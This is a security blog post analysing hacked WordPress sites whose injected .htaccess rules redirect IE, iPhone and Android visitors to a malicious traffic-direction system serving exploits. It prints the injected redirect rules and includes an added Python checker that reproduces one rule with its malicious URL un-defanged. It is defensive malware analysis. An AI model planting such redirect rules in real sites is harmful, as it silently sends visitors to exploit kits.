Hacked Websites Redirect to Bitcoin

May 4, 2015, by Denis Sinegubko


Recently, we began to notice that some hacked websites were redirecting traffic from certain browsers to the BitCoin site, bitcoin.org. What’s going on? Is Bitcoin using black hat SEO? Is their site malicious?

[Image: Redirect chain to bitcoin.org in Unmask Parasites results]

As you can see, the hacked website doesn’t redirect to bitcoin.org directly. It first redirects to 194 .6 .233 .7/mxjbb . cgi?default, which acts as a traffic directing system (TDS). The TDS analyzes request parameters specific to the visitor (IP, browser, referrer, etc.) and decides what to do with that particular request. It may have different routes for users from different countries or for users with different browsers. Furthermore, the TDS may be completely uninterested in certain requests (e.g. requests from search engine and security bots, or requests from browsers that are very hard to exploit). A typical TDS either returns an HTTP error (e.g. 404 Page Not Found) for such requests or redirects the unwanted traffic to some neutral third-party site. Most TDSs are configured to dump unwanted traffic to google.com.

In this particular case, the hackers decided to configure their TDS to dump unwanted traffic to bitcoin.org. We can only speculate about the intention, but most likely it was to make this crypto-currency more popular.

Malicious Redirects

OK, so the hacked websites redirect unwanted traffic to bitcoin.org, but what do they do with the traffic they are interested in?

In the case of Internet Explorer browsers, we see “194 .6 .233 .7/mxjbb . cgi?default” redirecting to “hxxp://corp . thebridge .jp/wp-api.php”, another hacked site where the wp-api.php page serves malicious JavaScript crafted specifically for Internet Explorer. The script works in IE8 compatibility mode (“IE=EmulateIE8”). It also uses ActiveX objects to inspect the visitor’s computer and check whether Kaspersky or Trend Micro antivirus, or VMware, VirtualBox or Parallels virtualization software, is present.

If none of these are found, the malware injects a Flash exploit from “book . bondcube . biz”.

Infected .htaccess

Now let’s see what’s going on with the hacked sites.

In the .htaccess files, hackers injected the following mod_rewrite rules:

#BEGIN WordPress

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "MSIE|Trident|iPhone|Presto" [NC]
RewriteRule ^(.*)$ hxxp://194 .6 .233 .7/mxjbb .cgi?default [L,R=302]

#END WordPress

This code redirects every visitor whose User-Agent header matches MSIE or Trident (Microsoft Internet Explorer and other Trident-based browsers), Presto (e.g. some versions of Opera) or iPhone to the malicious TDS on “194 .6 .233 .7”. The [NC] flag makes the match case-insensitive, and R=302 issues a temporary redirect.

Note that they placed the code inside the “#BEGIN WordPress …#END WordPress” comments to make them look more credible. We see this kind of thing quite often, so don’t be fooled.

If you check the Google Safe Browsing diagnostic page for this IP address, it currently reports 1825 infected domains. Note that Google actually provides a report for “194.6.233.0”, which corresponds to all IP addresses in the 194 .6 .233 .0-255 subnetwork (Ukraine, Kiev, Specavtomatika Ltd).

Indeed, this is not the first wave of this attack. For example, in March we saw the following malicious code in .htaccess files:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "android" [NC]
RewriteRule ^(.*)$ hxxp://194 .6 .233 .48/BrowserCheck [L,R=302]

These are almost the same mod_rewrite rules. Back then they targeted Android devices and redirected to a TDS on a neighboring IP address in the same subnetwork.

Some other IPs in this subnetwork are also known for malware distribution. For example, check this VirusTotal report for 194 .6 .233 .23.
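To show how a site owner can audit their own .htaccess for the pattern described above (a User-Agent-conditional RewriteRule sending visitors to an external host, possibly one inside the reported 194.6.233.0/24 range), here is a small Python checker. It is an added example written for this post, not code from Sucuri or from the original article. The two .htaccess samples are constructed: the first reproduces the injected block quoted above with its target URL re-fanged so that urlparse can read it, the second is the standard WordPress permalink block for comparison. The site hostname (example.com) is an assumption.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed sample: the injected block quoted in the post, re-fanged.
INJECTED_HTACCESS = """\
#BEGIN WordPress

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "MSIE|Trident|iPhone|Presto" [NC]
RewriteRule ^(.*)$ http://194.6.233.7/mxjbb.cgi?default [L,R=302]

#END WordPress
"""

# Constructed sample: the standard WordPress permalink block, for comparison.
LEGIT_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# The subnet the post says Google Safe Browsing reports as a whole.
SUSPECT_NETWORKS = [ipaddress.ip_network("194.6.233.0/24")]

COND_RE = re.compile(
    r'^\s*RewriteCond\s+(?P<var>\S+)\s+(?P<pat>"[^"]*"|\S+)(?:\s+(?P<flags>\[[^\]]*\]))?\s*$', re.I)
RULE_RE = re.compile(
    r'^\s*RewriteRule\s+(?P<pat>\S+)\s+(?P<target>\S+)(?:\s+(?P<flags>\[[^\]]*\]))?\s*$', re.I)


def _flags(raw):
    """'[L,R=302]' -> {'L', 'R=302'}; mod_rewrite flags are comma separated."""
    return set(f.strip() for f in raw.strip("[]").split(",")) if raw else set()


def parse_rules(text):
    """Pair each RewriteRule with the RewriteCond lines that precede it, as mod_rewrite does."""
    rules, pending = [], []
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            pending.append({"var": m["var"], "pattern": m["pat"].strip('"'), "flags": _flags(m["flags"])})
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"pattern": m["pat"], "target": m["target"], "flags": _flags(m["flags"]), "conds": pending})
            pending = []
    return rules


def rule_matches_user_agent(rule, user_agent):
    """Emulate the User-Agent conditions of one rule: every HTTP_USER_AGENT cond must match (ANDed)."""
    for cond in rule["conds"]:
        if cond["var"].upper() != "%{HTTP_USER_AGENT}":
            continue
        re_flags = re.I if "NC" in cond["flags"] else 0  # [NC] = case-insensitive
        if not re.search(cond["pattern"], user_agent, re_flags):
            return False
    return True


def audit_htaccess(text, site_host):
    """Return (target, reasons) for every rule that redirects visitors off-site."""
    findings = []
    for rule in parse_rules(text):
        url = urlparse(rule["target"])
        if url.scheme not in ("http", "https") or not url.hostname:
            continue  # internal rewrite such as /index.php, or the '-' no-op target
        if url.hostname == site_host:
            continue
        reasons = ["redirects off-site"]
        if any(c["var"].upper() == "%{HTTP_USER_AGENT}" for c in rule["conds"]):
            reasons.append("conditional on User-Agent")
        try:
            ip = ipaddress.ip_address(url.hostname)
            if any(ip in net for net in SUSPECT_NETWORKS):
                reasons.append("target in suspect subnet")
        except ValueError:
            pass  # target is a hostname, not a bare IP
        findings.append((rule["target"], reasons))
    return findings


if __name__ == "__main__":
    for name, text in (("injected", INJECTED_HTACCESS), ("legit", LEGIT_HTACCESS)):
        print(name, audit_htaccess(text, "example.com"))
```

Running the script flags the injected block on all three counts and reports nothing for the stock WordPress block; rule_matches_user_agent lets you confirm which of your visitors (IE, iPhone) the rule would have redirected and which (Chrome, Googlebot) it would have left alone, which is exactly why such infections go unnoticed by the site owner.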

Infection Vector: Outdated Plugins

This infection targets mainly WordPress websites. On most of the infected sites we cleaned, we found old versions of the Slider Revolution (Revslider) plugin and backdoors uploaded via the Revslider vulnerabilities (similar to those used in the SoakSoak infection).

The vulnerabilities in the Revslider plugin have been fixed for more than a year now, but many users and themes that incorporated the plugin have still failed to update (update information). We saw many massive attacks that exploited these vulnerabilities over the past six months, and thousands of webmasters learned the importance of timely plugin updates the hard way. Nonetheless, there are still many sites out there that use outdated themes and plugins. Inevitably, hackers find such sites and compromise them.

Please don’t think that only the Slider Revolution plugin needs to be updated. Keep all of your plugins and themes up-to-date. Any plugin can have critical vulnerabilities at any given time, known or unknown. Even the most popular plugins can have security issues. For example, Jetpack, WordPress SEO, Gravity Forms and many other plugins recently fixed a common XSS vulnerability. Moral of the story: please update!

If you find it hard to keep up with all the security news and can’t quickly update your site software, we recommend using a website firewall (WAF) to virtually patch your site against attacks that try to exploit known and unknown weaknesses in code, otherwise known as software vulnerabilities.


Categories: Website Security, WordPress SecurityTags: Conditional Malware, Hacked Websites, Redirects, Website Ransomware, WordPress Plugins and Themes

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Comments

  1. Denis Sinegubko

    May 22, 2015

    Thanks for sharing this.

    Given the dates and numbers, it may not be this very infection alone. We began to notice many redirects to bitcoin.org in the second half of April. But in your stats the numbers are pretty consistent since the second half of March. I also doubt that the hackers are ready to dump millions of hits of English-speaking traffic to whatever site. However, if this is really that attack, I’m impressed.
